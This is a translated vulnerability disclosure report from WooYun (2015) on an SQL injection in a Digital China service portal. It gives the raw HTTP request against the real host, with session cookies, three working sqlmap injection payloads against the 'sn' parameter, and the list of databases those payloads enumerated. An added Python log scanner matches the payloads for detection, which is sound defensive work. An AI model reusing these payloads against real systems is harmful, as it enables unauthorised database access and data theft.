Vulnerability summary

Defect ID: wooyun-2015-0140711

Title: SQL injection in a Digital China (神州数码) system (affects more than 800 enterprises, including JD.com and Walmart)

Vendor: digitalchina.com

Author: 路人甲

Submitted: 2015-09-12 22:33

Fixed: 2015-10-29 09:24

Published: 2015-10-29 09:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-12: Details sent to the vendor; awaiting vendor handling
2015-09-14: Vendor confirmed; details disclosed to the vendor only
2015-09-24: Details disclosed to core white hats and domain experts
2015-10-04: Details disclosed to regular white hats
2015-10-14: Details disclosed to intern white hats
2015-10-29: Details disclosed to the public

Brief description:

Only simple input handling is applied to the parameter, and it is easily bypassed.

Detailed description:

Injectable parameter: sn
Impact reference: WooYun: SQL injection in a Digital China system (affects more than 800 enterprises, including JD.com and Walmart)
POST /sms/reg/a.asp?func_id=Find&model=e&sn=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://servexpress.digitalchina.com/
Cookie: ASPSESSIONIDCAQCBTTQ=OIIPFFNBDKHFIHCDJNCEOINL; ASPSESSIONIDCASDATTQ=CGPDLMMBIHGCHABEPKKHLCFD; JSESSIONID=9A2269181A2C20A3826BC9FEF251141B.tomcat02; _ga=GA1.2.1073242692.1441976613; _gat=1; clientlanguage=zh_CN; Hm_lvt_d9874091f2c0f2204d7af1dfc269de5b=1441976615; Hm_lpvt_d9874091f2c0f2204d7af1dfc269de5b=1441976634; EZMSSO=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; _error_remaining=2
Host: servexpress.digitalchina.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Proof of vulnerability:

---
Parameter: sn (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: func_id=Find&model=e&sn=-2470' OR 3751=3751 AND 'PsEo'='PsEo
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: func_id=Find&model=e&sn=1' AND 9098=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9098=9098) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZMJB'='ZMJB
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: func_id=Find&model=e&sn=1' AND 3467=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'TXNy'='TXNy
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Oracle
current user: 'ERS'
current user is DBA: False
available databases [13]:
[*] ERS
[*] PROJECTOR
[*] SXG
[*] SYS
[*] SYSTEM
[*] TOSHIBA
[*] U_AMD
[*] U_DELL
[*] U_HP
[*] U_KONICA
[*] U_MSI
[*] U_SEAGATE
[*] XDB
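As an added defender-side example (not part of the original report), the following Python scans IIS-style access log lines for the three sqlmap payload families shown in the proof above, looking only at the decoded sn parameter of requests to a.asp. The log layout, field order and sample lines are constructed assumptions for the demo, not data from the report.

```python
import re
from urllib.parse import parse_qs

# Signatures for the three sqlmap techniques shown in the report. sn is bound as an
# Oracle string, so every payload opens with a quote and re-balances it via AND 'x'='x.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*(?:OR|AND)\s+\d+\s*=\s*\d+", re.I),
    "error-based (XMLType)": re.compile(r"\bXMLType\s*\(|(?:CHR\(\d+\)\s*\|\|\s*){2,}", re.I),
    "time-based (heavy query)": re.compile(r"FROM\s+ALL_USERS\s+\w+\s*,\s*ALL_USERS", re.I),
}

def classify_query(query):
    """Return the technique names whose signature matches the decoded sn parameter."""
    hits = []
    # parse_qs splits on '&' and percent-decodes each value once.
    for value in parse_qs(query, keep_blank_values=True).get("sn", []):
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append(name)
    return hits

# Constructed sample lines in a simplified IIS W3C layout (assumed, not from the report):
# date time cs-method cs-uri-stem cs-uri-query sc-status
LOG_LINES = [
    "2015-09-12 14:33:01 POST /sms/reg/a.asp func_id=Find&model=e&sn=1 200",
    "2015-09-12 14:33:05 POST /sms/reg/a.asp func_id=Find&model=e&sn=-2470%27%20OR%203751%3D3751%20AND%20%27PsEo%27%3D%27PsEo 200",
    "2015-09-12 14:33:09 POST /sms/reg/a.asp func_id=Find&model=e&sn=1%27%20AND%209098%3D(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)))%20FROM%20DUAL)%20AND%20%27ZMJB%27%3D%27ZMJB 500",
    "2015-09-12 14:33:15 POST /sms/reg/a.asp func_id=Find&model=e&sn=1%27%20AND%203467%3D(SELECT%20COUNT(*)%20FROM%20ALL_USERS%20T1,ALL_USERS%20T2)%20AND%20%27TXNy%27%3D%27TXNy 200",
]

def scan_log(lines):
    """Map 'date time' of each flagged request to the techniques found in its sn value."""
    findings = {}
    for line in lines:
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed line, skip it
        date, time, _method, stem, query, _status = fields[:6]
        if stem.lower().endswith("/a.asp"):
            hits = classify_query(query)
            if hits:
                findings[f"{date} {time}"] = hits
    return findings

if __name__ == "__main__":
    for when, hits in scan_log(LOG_LINES).items():
        print(when, "->", ", ".join(hits))
```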

Fix recommendation:

~~ Check the input more thoroughly.

Copyright notice: please credit the source (路人甲@乌云) when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-09-14 09:23

Vendor reply:

Will handle it as soon as possible!

Latest status:

None yet